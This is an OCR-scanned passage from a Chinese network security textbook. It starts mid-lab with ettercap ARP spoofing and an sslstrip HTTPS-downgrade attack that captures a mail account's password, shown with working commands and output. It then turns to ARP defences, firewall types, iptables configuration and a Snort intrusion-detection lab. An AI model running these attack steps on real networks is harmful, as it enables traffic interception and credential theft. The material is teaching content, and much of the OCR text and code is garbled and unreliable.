第 2 步 : 编译 文件 replace. filter。 要 使 用 这 个 脚本 ,还 需要 使 用 ettercap 自 带 的 编译 工 


具 把 这 个 脚本 编译 成 ettercap 可 以 识别 的 二 进 制 文件 ,使 用 如 下 命令 编译 ,replace. ef 就 是 
已 经 编译 完成 的 过 滤 脚 本 。 
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# etterfilter replace. filter - o replace. ef 

第 3 步 : 发 动 攻击 。 然 后 执行 如 下 命令 ,发 动 攻击 。 

# ettercap -T -q - i eth0 - Freplace.ef - M arp:remote //192.168.0.101/ //192.168.0.1/ 
该 脚本 执行 成 功 之 后 ,被 欺骗 者 网 页 时 会 弹出 提示 框 。 

4. 使 用 sslstrip 突破 ssl 加 密 .捕获 密码 

原理 如 下 。 


CD 攻击 者 先进 行 arp 欺骗 ,使 得 攻击 者 能 捕获 被 欺骗 者 的 网 络 流量 。 
(2) 攻击 者 利用 被 欺骗 者 对 浏览 器 地 址 栏 中 https 与 http HRA AA https 连接 
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都 蔡 换 为 http 连接 。 

(3) 同时 ,攻击 者 与 服务 器 建立 正常 的 https 连接 。 

COD. 由 于 http 通信 和 是 明文 传输 .攻击 者 能 够 轻易 捕获 密码 。 

第 1 步 : 开启 内 核 转 发 功能 。 执 行 如 下 命令 ,开启 内 核 转发 功能 保证 攻击 过 程 中 被 攻 
击 者 不 断 网 : 


* echo 1 > /proc/sys/net/ipv4/ip forward 


第 2 Jp. 执行 iptables 命令 。 执 行 如 下 命令 ,把 80 端口 的 流量 转发 到 sslstrip 监听 的 
10000 端口 上 。 


# iptables - t nat - A PREROUTING - p tcp - destination - port 80 - j REDIRECT - to 一 
ports 10000 


第 3 步 : 启动 sslstrip。 执 行 如 下 命令 ,启动 sslstrip, 在 攻击 过 程 中 ,sslstrip 窗口 不 要 
关闭 ,如 图 5-54 所 示 。 


* sslstrip 一 1 10000 


root@debian: ~ eoo 
root@debian: ~ . ME roor@dedian - * | 
rootMebian:-£ echo 1 > /proc/ sys/ net/ ipv4/ip forward 


rootGdebian:-4 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 
root@iebian: -# sslstrip -1 10000 


lsststrip 0.9 by Moxie Marlinspike running... 


5-54 启动 sslstrip 
第 4 步 : 执行 ettercap 命令 ,进行 arp 欺骗 。 
# ettercap -Tq — i eth0 — M arp:remote //192.168.0.101/ //192.168.0.1/ 


第 5 步 : 捕获 密码 。 被 欺骗 者 登录 163 邮箱 时 ,https 被 降级 为 http ,此 时 ettercap 捕获 
到 了 163 邮箱 的 账号 和 密码 ,如 图 5-55 所 示 。 


root@debian: ~ eoo 
. root@debian: ~ x root debian: - x 
rootGHebian:-4 ettercap -Tq -i eth0 -M arp: remote //192. 168. 0. 101/ //192. 168. 0. 1/ 
Starting Unified sniffing... 


[Text only Interface activated... 
Hit 'h' for inline help 


HTTP : 123.126.96.13:80 -> USER: ztg PASS: aaaaaaaa INFO: http://smart. mail. 163. com/ ?dv=smart 
CONTENT: url2-http98A9gF9gFsmart. mail. 163. com9gFindex. htm&username-ztg&password-aaaaaaaa&savelogin-0 


图 5-55 ”捕获 密码 


5.6.5 arp 欺骗 的 原理 与 防范 


1. arp 欺骗 的 原理 
以 太 网 设备 (比如 网 卡 ) 都 有 自己 全 球 唯一 的 MAC 地 址 ,它们 是 以 MAC 地 址 来 传输 
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以 太 网 数据 包 的 ,但 是 以 太 网 设备 却 识 别 不 了 全 数据 包 中 的 人 地 址 ,所 以 要 在 以 太 网 中 
进行 了 P 通 信 , 就 需要 一 个 协议 来 建立 耳 地 址 与 MAC 地 址 的 对 应 关系 ,使 IP 数据 包 能 
够 发 送 到 一 个 确定 的 主机 上 。 这 种 功能 是 由 arp(Address Resolution Protocol) 来 完 
成 的 。 

arp 被 设计 成 用 来 实现 IP 地 址 到 MAC 地 址 的 映射 。arp 使 用 一 个 被 称 为 arp 高 速 组 
存 的 表 来 存储 这 种 映射 关系 ,arp 高 速 缓存 用 来 存储 临时 数据 CIP 地 址 与 MAC 地 址 的 映射 
关系 ) ,存储 在 arp 高 速 缓存 中 的 数据 在 几 分 钟 没 被 使 用 ,会 被 自动 删除 。 

arp 协议 不 管 是 否 发 送 了 arp 请 求 , 都 会 根据 收 到 的 任何 arp 应 答 数 据 包 对 本 地 的 arp 
高 速 缓存 进行 更 新 ,将 应 答 数据 包 中 的 IP 地 址 和 MAC 地 址 存储 在 arp 高 速 缓存 中 。 这 正 
是 实现 arp 欺骗 的 关键 。 可 以 通过 编程 的 方式 构建 arp 应 答 数 据 包 , 然 后 发 送 给 被 欺骗 者 ， 
用 假 的 TP 地 址 与 MAC 地 址 的 映射 来 更 新 被 欺骗 者 的 arp 高 速 缓存 ,实现 对 被 欺骗 者 的 
arp 欺骗 。 

有 两 种 arp 欺骗 : 一 种 是 对 路 由 器 arp 高 速 缓存 的 欺骗 ; 另 一 种 是 对 内 网 计算 机 arp 
高 速 缓存 的 欺骗 。 

2. arp 欺骗 攻击 的 防范 

COD 在 客户 端 使 用 arp 命令 绑 定 网 关 的 IP/MAC( 例 如 arp -s 192. 168. 1. 1 00-e0-eb- 
81-81-85) 。 

(2) 在 交换 机 上 做 端口 与 MAC 地 址 的 静态 绑 定 。 

(3) 在 路 由 器 上 做 IP/MAC 地 址 的 静态 绑 定 。 

(4) 使 用 arp 服务 器 定时 广播 网 段 内 所 有 主机 的 正确 IP/MAC 映射 表 。 

(5) 及 时 升级 客户 端的 操作 系统 和 应 用 程序 补丁 。 

(6) 升级 杀毒 软件 及 其 病毒 库 。 

(7) 有 些 工具 可 以 用 来 帮助 判断 是 否 受 到 了 arp 欺骗 ,保护 计算 机 免 受 arp 毒化 ,并 且 
能 够 检测 出 arp 缓存 的 更 变 ,比如 : ARPon, XARP, 
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计算 机 网 络 安全 是 指 利用 网 络 管理 控制 和 技术 措施 ,保证 在 一 个 网 络 环境 里 ,信息 数据 
的 保密 性 、 完 整 性 和 可 使 用 性 受到 保护 。 网 络 安全 防护 的 根本 目的 ,就 是 防止 计算 机 网 络 存 
储 、 传 输 的 信息 被 非法 使 用 、 破 坏 和 算 改 。 防 火 墙 技术 正 是 实现 上 述 目的 的 一 种 常用 的 计算 
机 网 络 安全 技术 。 


5.7.1 防火 墙 的 功能 与 分 类 


防火 墙 (FireWall) 是 一 种 重要 的 网 络 防护 设备 .是 一 种 保护 计算 机 网 络 、 防 御 网 络 入 侵 
的 有 效 机 制 。 

1. 防火 墙 的 基本 原理 

防火 墙 是 控制 从 网 络 外 部 访问 本 网 络 的 设备 ,通常 位 于 内 网 与 Internet 的 连接 处 (网 络 
边界 ), 充 当 访 问 网 络 的 唯一 入 口 ( 出 口 ), 用 来 加 强 网 络 之 间 的 访问 控制 ,防止 外 部 网 络 用 户 
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以 非法 手段 通过 外 部 网 络 进入 内 部 网 络 ,访问 内 部 网 络 资源 ,从 而 保护 内 部 网 络 设备 。 防 火 
墙根 据 过 滤 规 则 来 判断 是 否 允 许 某 个 访问 请 求 。 

2. 防火 墙 的 作用 

防火 墙 能 够 提高 网 络 整体 的 安全 性 ,因而 给 网 络 安全 带 来 了 众多 的 好 处 ,防火 墙 的 主要 
作用 如 下 。 

(1) 保护 易 受 攻击 的 服务 。 

(2) 控制 对 特殊 站 点 的 访问 。 

(3) 集中 的 安全 管理 。 

(4) 过 滤 非 法 用 户 , 对 网 络 访问 进行 记录 和 统计 。 

3. 防火 墙 的 基本 类 型 

根据 防火 墙 的 外 在 形式 可 以 分 为 软件 防火 墙 、 硬 件 防火 墙 、 主 机 防火 墙 、 网 络 防火 墙 、 
Windows [jj Ji , Linux 防火 墙 等 。 

根据 防火 墙 所 采用 的 技术 可 以 分 为 包 过 滤 型 `NAT 代理 型 和 监测 型 防火 墙 等 。 

CD 包 过 滤 型 

包 过 滤 防 火 墙 的 原理 : 监视 并 且 过 滤 网 络 上 流入 流出 的 IP 数据 包 , 拒 绝 发 送 可 疑 的 数 
据 包 。 包 过 滤 防 火 墙 设置 在 网 络 层 ,可 以 在 路 由 器 上 实现 包 过 滤 。 首 先 应 建立 一 定数 量 的 
信息 过 滤 表 。 数 据 包 中 都 会 包含 一 些 特定 信息 ,如 源 IP 地 址 .目的 IP 地 址 、 传 输 协 议 类 型 
《TCP、UDP、ICMP 等 ) 源 端口 号 .目的 端口 号 .连接 请 求 方向 等 。 当 一 个 数据 包 满 足 过 滤 
表 中 的 规则 时 , 则 允许 数据 包 通 过 ,否则 便 会 将 其 丢弃 。 

先进 的 包 过 滤 型 防火 墙 可 以 判断 这 一 点 , 它 可 以 提供 内 部 信息 以 说 明 所 通过 的 连接 状 
态 和 一 些 数据 流 的 内 容 , 把 判断 的 信息 同 规则 表 进 行 比较 ,在 规则 表 中 定义 了 各 种 规则 来 表 
明 是 否 同意 或 拒绝 包 的 通过 。 包 过 滤 防 火 墙 检查 每 一 条 规则 直至 发 现 包 中 的 信息 与 某 规则 
相符 。 如 果 没 有 一 条 规则 能 符合 ,防火 墙 就 会 使 用 默认 规则 ,一 般 情况 下 ,默认 规则 就 是 要 
求 防火 墙 丢 弃 该 包 。 其 次 ,通过 定义 基于 TCP 或 UDP 数据 包 的 端口 号 ,防火 墙 能 够 判断 是 
否 允 许 建立 特定 的 连接 ,如 Telnet, FTP 连接 。 

包 过 滤 技 术 的 优 缺 点 如 下 。 

CD 优点 。 简 单 实用 ,实现 成 本 较 低 ,在 应 用 环境 比较 简单 的 情况 下 ,能 够 以 较 小 的 代价 
在 一 定 程度 上 保证 系统 的 安全 。 

© 缺点 。 包 过 滤 技 术 是 一 种 完全 基于 网 络 层 的 安全 技术 ,无 法 识别 基于 应 用 层 的 恶意 
侵入 ,如 图 5-56 所 示 。 


包含 恶意 数据 
E IIIS 防火 墙 只 检查 
网 络 层 TCP. IPJZ 


IP 数 据 包 
图 5-56 包 过 滤 技 术 


(2) NAT( 网 络 地 址 转换 ) 
NAT 是 一 种 用 于 把 私有 IP 地 址 转换 成 公有 IP 地 址 的 技术 。 它 允许 具有 私有 IP 地 址 
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的 内 部 网 络 访问 互联 网 。 

当 受 保护 网 联 到 Internet 上 时 , 受 保护 网 用 户 车 要 访问 Internet, 必 须 使 用 一 个 合法 的 
IP 地 址 。 但 由 于 合法 Internet IP 地 址 有 限 , 而 且 受 保护 网 络 往往 有 自己 的 一 套 IP 地 址 规 
划 ( 非 正式 IP 地 址 )。 网 络 地 址 转换 器 就 是 在 防火 墙 上 装 一 个 合法 IP 地 址 集 。 当 内 部 某 一 
用 户 要 访问 Internet 时 ,防火 墙 动态 地 从 地 址 集中 选 一 个 未 分 配 的 地 址 分 配给 该 用 户 ,该 用 
户 即 可 使 用 这 个 合法 地 址 进行 通信 。 同 时 ,对 于 内 部 的 某 些 服务 器 如 Web 服务 器 ,网 络 地 
址 转换 器 允许 为 其 分 配 一 个 固定 的 合法 地 址 。 外 部 网 络 的 用 户 就 可 通过 防火 墙 来 访问 内 部 
的 服务 器 。 这 种 技术 既 缓 解 了 少量 的 IP 地 址 和 大 量 的 主机 之 间 的 矛盾 ,又 对 外 隐藏 了 内 部 
主机 的 IP 地 址 ,提高 了 安全 性 。 

(3) 代理 型 

代理 防火 墙 由 代理 服务 器 和 过 滤 路 由 器 组 成 。 代 理 服 务 器 位 于 客户 机 与 服务 器 之 间 。 
从 客户 机 来 看 ,代理 服务 器 相当 于 一 台 真 正 的 服务 器 ; 而 从 服务 器 来 看 ,代理 服务 器 又 是 一 
台 真 正 的 客户 机 。 当 客户 机 访问 服务 器 时 ,首先 将 请 求 发 给 代理 服务 器 ,代理 服务 器 再 根据 
请 求 向 服务 器 读 取 数 据 , 然 后 再 将 读 来 的 数据 传 给 客户 机 。 由 于 代理 服务 器 将 内 网 与 外 网 
隔 开 ,从 外 面 只 能 看 到 代理 服务 器 ,因此 外 部 的 恶意 入 侵 很 难 伤害 到 内 网 系统 。 

代理 型 防火 墙 的 优 缺 点 如 下 。 

D 优点 。 安 全 性 较 高 ,可 以 针对 应 用 层 进行 侦 测 和 扫描 ,对 付 基于 应 用 层 的 侵入 和 病 
毒 都 十 分 有 效 ,如 图 5-57 所 示 。 


防火 墙 只 检查 
应 用 层 数据 
eei d 


IP 数 据 包 
图 5-57 代理 型 防火 墙 


© 缺点 。 对 系统 的 整体 性 能 有 较 大 的 影响 ,而 且 代理 服务 器 必须 针对 客户 机 可 能 产生 
的 所 有 应 用 类 型 逐一 进行 设置 ,大 大 增加 了 系统 管理 的 复杂 性 。 

(4) 监测 型 

监测 型 防火 墙 是 第 三 代 网 络 安全 技术 。 监 测 型 防火 墙 能 够 对 各 层 的 数据 进行 主动 的 、 
实时 的 监测 ,如 图 5-58 所 示 ,在 对 这 些 数据 加 以 分 析 的 基础 上 ,监测 型 防火 墙 能 够 有 效 地 判 
断 出 各 层 中 的 非法 入 侵 。 虽 然 监测 型 防火 墙 在 安全 性 上 已 超越 了 包 过 滤 型 和 代理 服务 器 型 
防火 墙 ,但 由 于 监测 型 防火 墙 技 术 的 实现 成 本 较 高 ,也 不 易 管理 ,所 以 目前 在 实用 中 的 防火 


B- | Di rujan 


IP 数 据 包 
图 5-58 监测 型 防火 墙 
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墙 产品 仍然 以 第 二 代 代 理 型 产品 为 主 ,但 在 某 些 方面 也 已 经 开始 使 用 监测 型 防火 墙 。 
5.7.2 实例 : Linux 防火 墙 配 置 


Linux 提供 了 一 个 非常 优秀 的 防火 墙 工 具 netfilter/iptables, 它 免费 上 且 功能 强大 ,可 以 
对 流入 流出 的 信息 进行 灵活 控制 ,并 且 可 以 在 一 台 低 配置 的 机 器 上 很 好 地 运行 。 

1. netfilter/iptables 介绍 

Linux fE 2. 4 版 本 以 后 的 内 核 中 包含 netfilter/iptables, 系 统 这 种 内 置 的 TP 数据 包 过 
滤 工 具 使 得 配置 防火 墙 和 数据 包 过 滤 变 得 更 加 容易 ,使 用 户 可 以 完全 控制 防火 墙 配 置 和 数 
据 包 过 滤 。netfilter/iptables 允许 为 防火 墙 建立 可 定制 的 规则 来 控制 数据 包 过 滤 , 并 且 还 
允许 配置 有 状态 的 防火 墙 。 另 外 ,netfilter/iptables 还 可 以 实现 NAT( 网 络 地 址 转换 ) 和 数 
据 包 的 分 割 等 功能 。netfilter/iptables 从 ipchains 和 ipwadfm 演化 而 来 ,功能 更 加 强大 。 

netfilter 组 件 也 称 为 内 核 空间 ,是 内 核 的 一 部 分 ,由 一 些 数 据 包 过 滤 表 组 成 ,这 些 表 包 
含 内 核 用 来 控制 数据 包 过 滤 处 理 的 规则 集 。 

iptables 组 件 是 一 种 工具 ,也 称 为 用 户 空间 , 它 使 插入 、 修 改 和 删除 数据 包 过 滤 表 中 的 
规则 变 得 容易 。 

使 用 用 户 空间 (iptables) 构 建 自 己 定制 的 规则 ,这 些 规则 存储 在 内 核 空 间 的 过 滤 表 中 。 
这 些 规则 中 的 目标 告诉 内 核对 满足 条 件 的 数据 包 采 取 相 应 的 措施 。 

根据 规则 处 理 数 据 包 的 类 型 ,将 规则 添加 到 不 同 的 链 中 。 处 理 入 站 数据 包 的 规则 被 添 
加 到 INPUT 链 中 。 处 理 出 站 数据 包 的 规则 被 添加 到 OUTPUT 链 中 。 处 理 正 在 转发 的 数 
据 包 的 规则 被 添加 到 FORWARD 链 中 。 这 三 个 链 是 数据 包 过 滤 表 (filter) 中 内 置 的 默认 主 
规则 链 。 每 个 链 都 可 以 有 一 个 策略 , 即 要 执行 的 默认 操作 , 当 数 据 包 与 链 中 的 所 有 规则 都 不 
匹配 时 ,将 执行 此 操作 (理想 的 策略 应 该 丢弃 该 数据 包 ) 。 

数据 包 经 过 filter 表 的 过 程 如 图 5-59 所 示 。 


FORWARD 链 


进 数 据 包 出 数据 包 


INPUT 链 OUTPUT 链 


本 地 处 理 进程 


图 5-59 数据 包 经 过 filter 表 的 过 程 


通过 使 用 iptables 命令 建立 过 滤 规 则 ,并 将 这 些 规则 添加 到 内 核 空间 过 滤 表 内 的 链 中 。 
添加 、 删除 和 修改 规则 的 命令 语法 如 下 : 
# iptables [ - t table] command [match] [target] 
(1) table 
L-t table] 有 3 种 可 用 的 表 选 项 : filter.nat 和 mangle。 该 选项 不 是 必需 的 ,如 未 指定 ， 
则 filter 表 作 为 默认 表 。 
filter 表 用 于 一 般 的 数据 包 过 滤 ,包含 INPUT,OUTPUT fll FORWARD f£, 
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nat 表 用 于 要 转发 的 数据 包 , 包含 PREROUTING 链 、OUTPUT 链 和 
POSTROUTING 链 。 

mangle 表 用 于 数据 包 及 其 头 部 的 更 改 , 包 含 PREROUTING 链 和 OUTPUT 链 。 

(2) command 

command 是 iptables 命令 中 最 重要 的 部 分 , 它 告诉 iptables 命令 要 进行 的 操作 ,如 插入 
规则 、 删 除 规则 、 将 规则 添加 到 链 尾 等 。 

常用 的 一 些 命令 如 表 5-5 所 示 。 

表 5-5 iptables 常用 命令 
操作 命令 功 能 


-A 或 --append 该 命令 将 一 条 规则 附加 到 链 的 末尾 
通过 用 -D 指定 要 匹配 的 规则 或 者 指定 规则 在 链 中 的 位 置 编 号 ,该 命令 从 链 中 删除 


-D 或 --delete 该 规则 
iE 该 命令 设置 链 的 默认 目标 , 即 策略 。 所 有 与 链 中 任何 规则 都 不 匹配 的 数据 包 都 将 被 
P 强制 使 用 此 链 的 策略 


-N 或 --new-chain | 用 命令 中 所 指定 的 名 称 创建 一 个 新 链 
如 果 指 定 链 名 ,该 命令 删除 链 中 的 所 有 规则 ,如果 未 指定 链 名 ,该 命令 删除 所 有 链 中 


Mao 的 所 有 规则 。 此 参数 用 于 快速 清除 
TL dis 列 出 指定 链 中 的 所 有 规则 
示例 : 


# iptables — A INPUT — s 192.168.0.10 - j ACCEPT 

该 命令 将 一 条 规则 附加 到 INPUT 链 的 末尾 ,确定 来 自 源 地 址 192. 168. 0. 10 的 数据 包 
可 以 接受 (ACCEPT)。 

f iptables -D INPUT -- dport 80 - j DROP 

该 命令 从 INPUT 链 删 除 规则 。 

f iptables - P INPUT DROP 

该 命令 将 INPUT 链 的 默认 目标 指定 为 DROP。 这 将 丢弃 所 有 与 INPUT 链 中 任何 规 
则 都 不 匹配 的 数据 包 。 

(3) match 

match 部 分 指定 数据 包 与 规则 匹配 所 应 具有 的 特征 ,比如 源 下 地 址 .目的 IP 地 址 .协议 等 。 

常用 的 规则 匹配 器 如 表 5-6 所 示 。 

表 5-6 iptables 常用 的 规则 匹配 器 
$ 数 xj 能 


该 通用 协议 匹配 用 于 检查 某 些 特定 协议 。 协 议 示 例 有 TCP, UDP, ICMP, HE 5 
-p 或 --protocol 分 隔 的 任何 这 3 种 协议 的 组 合 列表 以 及 ALL( 用 于 所 有 协议 )。ALL 是 默认 匹配 。 
可 以 使 用 ! 符号 , 它 表示 不 与 该 项 匹配 
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续 表 
2 数 功 能 
该 源 匹配 用 于 根据 数据 包 的 源 IP 地 址 来 与 它们 匹配 。 该 匹配 还 允许 对 某 一 范围 
-s 或 --source 内 的 IP 地 址 进行 匹配 ,可 以 使 用 ! 符号 ,表示 不 与 该 项 匹配 。 默 认 源 匹配 与 所 有 


IP 地 址 匹配 


-d 或 --destination 


该 目的 地 匹配 用 于 根据 数据 包 的 目的 地 IP 地 址 来 与 它们 匹配 。 该 匹配 还 允许 对 
某 一 范围 内 IP 地 址 进行 匹配 ,可 以 使 用 ! 符号 ,表示 不 与 该 项 匹配 


示例 : 


# iptables — A INPUT — p TCP, UDP 

# iptables — A INPUT — p ! ICMP 

# iptables - A OUTPUT - s 192.168.0.10 
# iptables — A OUTPUT -s ! 210.43.1.100 
# iptables — A INPUT —d 192.168.1.1 

# iptables — A OUTPUT -d ! 210.43.1.100 


(4) target 
目标 是 由 规则 指定 的 操作 ,常用 的 一 些 目标 和 功能 说 明 如 表 5-7 所 示 。 


表 5-7 iptables 常用 的 目标 


H 标 x 能 
当 数据 包 与 具有 ACCEPT 目标 的 规则 完全 匹配 时 ,会 被 接受 (允许 它 前 往 目 的 地 ) ,并且 它 
ACCEPT | 将 停止 遍历 链 ( 虽 然 该 数据 包 可 能 遍历 另 一 个 表 中 的 其 他 链 , 并 且 有 可 能 在 那里 被 丢弃 )。 
该 目标 被 指定 为 -i ACCEPT 
DROP 当 数据 包 与 具有 DROP 目标 的 规则 完全 匹配 时 ,会 阻塞 该 数据 包 , 并 且 不 对 它 做 进一步 处 
理 。 该 目标 被 指定 为 - DROP 
该 目标 的 工作 方式 与 DROP. 目标 相同 ,但 它 比 DROP 好 。 和 DROP 不 同 ,REJECT 不 会 在 
REJECT | 服务 器 和 客户 机 上 留 下 死 套 接 字 。 另 外 ,REJECT 将 错误 消息 发 回 给 数据 包 的 发 送 方 。 该 
目标 被 指定 为 - REJECT 
RETURN 在 规则 中 设置 的 RETURN 目标 让 与 该 规则 匹配 的 数据 包 停止 遍历 包含 该 规则 的 链 。 如 果 
链 是 如 INPUT 之 类 的 主 链 , 则 使 用 该 链 的 默认 策略 处 理 数据 包 。 它 被 指定 为 -i RETURN 
(5) 保存 规则 


用 上 述 方法 建立 的 规则 被 保存 到 内 核 中 ,这 些 规则 在 系统 重启 时 将 丢失 。 如 果 希 望 在 


后 还 能 使 用 这 些 规则 , 则 必须 使 用 iptables-save 命令 将 规则 保存 到 某 个 文件 


Giptables-script) 中。 


# iptables - save > iptables - script 


执行 如 上 命令 后 数据 包 过 滤 表 中 的 所 有 规则 都 被 保存 到 iptables-script 文件 中 。 当 系 
统 重启 时 ,可 以 执行 iptables-restore iptables-script 命令 将 规则 从 文件 iptables-script 中 恢 
复 到 内 核 空间 的 数据 包 过 滤 表 中 。 

2. Linux 防火 墙 的 配置 

创建 iptables example. sh 文件 ,内容 如 图 5-60 所 示 ,执行 如 下 两 条 命令 : 
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IgIbin/bash 
echo 1 > /proc/sys/net/ipv4/ip forward 

3 echo 1 > /proc/sys/net/ipvi/tcp syncookies 
A HINET_ IF-"pppO" 

5 INET_TF="etho" 

ELAN Ir-"ethi" 

7LAN IP RANGE-"192.168.0.0/24" 

IpT="/3bin/ iptables" 

9 TC="/abin/ ce” 

0 ODPROBE="/sbin/modprobe" 


2 QODPROBE ip tables 

3 $MODPROBE iptable nat 

4 $HODPROBE ip mat ftp 

5 PNODPROBE ip nat irc 

s FHODPROBE ipt mark 

7 jHODPROBE ip conntrack 
onntrack ftp 

3 $HODPROBE ip conntrack irc 

O jHODPRORE ipt MASQUERADE 


2for TABLE in filter nat angle ; do 
3 4IPT -t (TABLE -F 
4 &IPT -t PTABLE -X 
S SIPT -t STABLE -Z 


INPUT DROP 
OUTPUT ACCEPT 

FORWARD DROP 

mat -P PREROUTING ACCEPT 
nat -P OUTPUT ACCEPT 

mat -P POSTROUTING ACCEPT 


in (grep "n /etc/resolv.conf|awk '(print $2)'); do 
INPUT -p tcp -3 $DNS --sport domain -j ACCEPT 


INPUT -p udp -5 $DNS --sport domain -J ACCEPT 


OfIPT ~A INPUT -p tcp --sport 1080 -j DROP 
1 和 IPT -A INPUT -p tcp --sport 1090 -) DROP 

" 

3 $IPT -A INPUT -i $INET IF -s 60.2.139.192/27 -] DROP 
M $IPT -A INPUT -+ $INET IF -3 60.3.246.162/32 -3 DROP 
5 

IG IPT -A FORWARD -p tci 
7 $IPT -A FORVARD -p tcp 
i 

i3 {IPT ~A FORWARD -3 60.2.139.192/27 -j DROP 
0 4IPT -A FORVARD -d 60.2.139.192/27 -3 DROP 


sport 1080 -3 DROP 
dport 1080 -3 DROP 


i2 WIPT -A FORVARD -m string --algo bm --string "fund" -j DROP 


if [ SINET IF = "pppO* ) ; then 
S $IPT -t nat -A POSTROUTING -o $INET IF -5 $LAN IP RANGE -3 MASQUERADE 


7fIPT -t nat -A POSTROUTING -o $INET_IF -s LAN IP RANGE -j SNAT --to-source x.x.x.x 
za 

s 

0 no limit 

l$IPT -A FORVARD -= 192.166.0.10 -in mac --mec-source 00-16-EC-A8-Fi-A5 -j ACCEPT 

7 $IPT ~A FORVARD -d 192.168.0.18 -) ACCEPT 

3 4 JEA INTERNETE P 5] 

M PIPT -A INPUT -i $INET_IF -m state 
5 $IPT ~A INPUT -i $INET_IF -m state 


ate RELATED, ESTABLISHED -J ACCEPT 
ate NEV, INVALID -j DROP 


-m mac --mac-scurce 00-18-F3-30-86-45 -3 ACCEPT 
m mac --mac-scurce 00- 3 ACCEPT 


l41PT -A FORWARD -d 192.168.0.2 -J ACCEPT 
2 SIPT -A FORVARD -d 192.148.0.3 -) ACCEPT 


5-60 iptables_example. sh 文件 


# service iptables start // 启 动 iptables 
# sh iptables_example. sh // 配 置 防火 墙 的 过 滤 规 则 


下 面 是 对 iptables_example. sh 文件 的 说 明 。 
第 2 行 : 开启 内 核对 数据 包 的 转发 功能 。 
第 3 行 : 开启 内 核对 DoS(syn-flood) 攻 击 的 防范 功能 。 
第 4、5 行 : eth0(ppp0) 外 网 接口 .如 果 通 过 宽带 带动 局 域 网 上 网 , 则 用 ppp0。 
第 6 行 : ethl 内 网 接口 。 
第 12 一 20 行 : 加 载 模块 。 
第 28 一 33 行 : 对 filter 和 nat 表 设 置 默认 过 滤 规 则 。 
第 35 一 38 ÍT: 允许 dns 连接 。 
第 40—50 行 : 根据 指定 端口 和 IP 地 址 来 过 滤 掉 数据 包 。 
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第 52 fT: 通过 字符 串 匹 配 来 阻止 内 网 用 户 访问 一 些 网 站 (fund 指 包 含 该 单词 的 网 
页 受阻 )。 

第 54 一 58 行 : 根据 是 否 是 通过 宽带 (ppp0) 带 动 局 域 网 上 网 来 选择 相应 的 规则 。 

第 64,65 行 : 拒绝 互联 网 用 户 访 问 内 网 。 

第 68,69 行 : 对 局 域 网 内 计算 机 的 MAC 和 IP 地 址 进行 绑 定 , 可 以 防止 内 网 用 户 随意 
修改 IP 地 址 。 


58 入 侵 检 测 技术 


网 络 安全 风险 系数 在 不 断 提高 ,作为 主要 安全 防范 手段 的 防火 墙 ,在 很 多 方面 存在 弱 
点 ,比如 不 能 防止 已 感染 病毒 的 文件 ,无 法 防止 来 自 内 网 的 攻击 等 。 因 此 防火 墙 已 经 不 能 满 
足 人 们 对 网 络 安全 的 需求 。 而 IDSCIntrusion Detection System) 能 够 帮助 网 络 系统 迅速 发 
现 攻 击 ,IDS 可 以 自动 地 监控 网 络 的 数据 流 、 主 机 的 日 志 等 ,对 可 疑 的 事件 给 予 检测 和 响应 。 


5.8.1 实例 : 使 用 Snort 进行 入 侵 检 测 


1. 实验 环境 
实验 环境 如 图 5-61 所 示 。 
192.168.10.1 
* B ” 
Windows RHEL $.1(Linux) 
入 侵 者 Snort 
图 5-61 实验 环境 

2. 实验 步骤 


第 1 步 : 在 192. 168. 10. 5 上 安装 Snort。 到 http://www. snort. org/ 上 下 载 snort- 
2. 8. 0. 2. tar. gz 和 snortrules-pr-2. 4. tar. gz。 安 装 Snort 之 前 先 下 载 并 且 安 装 libpcap- 
devel, pcre 和 pcre-devel。 将 snort-2. 8. 0. 2. tar. gz 解压 后 进入 snort-2. 8. 0.2 ,然后 依次 执 
行 如 下 命令 : 

[root(2localhost snort- 2.8.0.2] # ./configure 

[root@ localhost snort - 2.8.0.2] # make 

[root@ localhost snort - 2.8.0.2] # make install 

[root@ localhost snort - 2.8.0.2] # mkdir - p /etc/snort/rules 

[root(2localhost snort - 2.8.0.2] # cp etc/ * . conf /etc/snort 

[root(2localhost snort - 2.8.0.2] # cp etc/ * . config /etc/snort 

[root(2localhost snort - 2.8.0.2] # cp etc/unicode. map /etc/snort 

[root(2localhost snort - 2.8.0.2] # mkdir /var/log/snort 


将 snortrules-pr-2. 4. tar. gz 解压 后 .将 其 中 的 规则 文件 全 部 复制 到 /etc/snort/rules 

F. 编辑 /etc/snort/snort. conf 文件 ,将 var RULE_PATH ../rules 改 为 var RULE_ 
PATH /etc/snort/rules。 编 辑 /etc/snort/rules/icmp. rules 文件 ,如 图 5-62 所 示 。 
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icmp.rules (/etc/snort/rules) - gedit 
IHO MIO XS) 搜索 G) IAW ZAD) HM 


Demprues x |O snortconr » |O scannues x |O snmp.rues x 
They include most of the 


Di? These rules are potentially bad ICMP traffic 


254 ICMP scanning tools and other "BAD" ICMP traffic (Such as redirect host) 


2h 
ls Other ICMP rules are included in icmp-info. rules 
2 


Ciglert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"TEST 51d:20000; rev. 

D 

Slalert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"ICMP ISS Pinger"; itype:8; content:"ISSPNGRO"; 
depth:32; reference:arachnids,158; classtype:attempted-recon; sid:465; rev:3;) 

Goalert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"ICMP L3retriever Ping'; icode:0; itype:8; 
content: ABCDEFGHIJKLMNOPORSTUVWABCDEFGHI*; depth:32; reference:arachnids,3ll; classtype:attempted- recon; 
51d:466; revi4;) 


FB HE 插入 


图 5-62 编辑 /etc/snort/rules/icmp. rules 文件 
第 2 步 : 在 192.168.10.5 上 启动 Snort 进行 人 侵 检测 ,执行 的 命令 如 下 : 
[root(2localhost ~]# snort - i ethl — c /etc/snort/snort.conf -A fast 一 1 /var/log/snort/ 


第 3 步 : 在 192.168.10.1 上 的 终端 窗口 中 执行 ping 192. 168. 10. 5 命令 ,如 图 5-63 所 
示 , 然 后 再 使 用 端口 扫描 工具 对 192. 168. 10. 5 进行 端口 扫描 ,如 图 5-64 所 示 o 


SelectIP: 192 . 168. 10 . 5 I Userange | 192 

T^ Use group of ranges 

Select potsrange [aiun + [Eak [V Use default ports st 

T^ Use ports ranges it 

EB 192.168.10.5 Ports (scanned 8T of 8T, opened: 1 closed. 66) 


| 
(Scan compiele 


图 5-64 对 192.168. 10. 5 进行 端口 扫描 
第 4 步 : 在 192.168.10.5 上 分 析 检 测 数据 ,如 图 5-65 所 示 , 前 4 行 对 应 于 第 3 步 的 
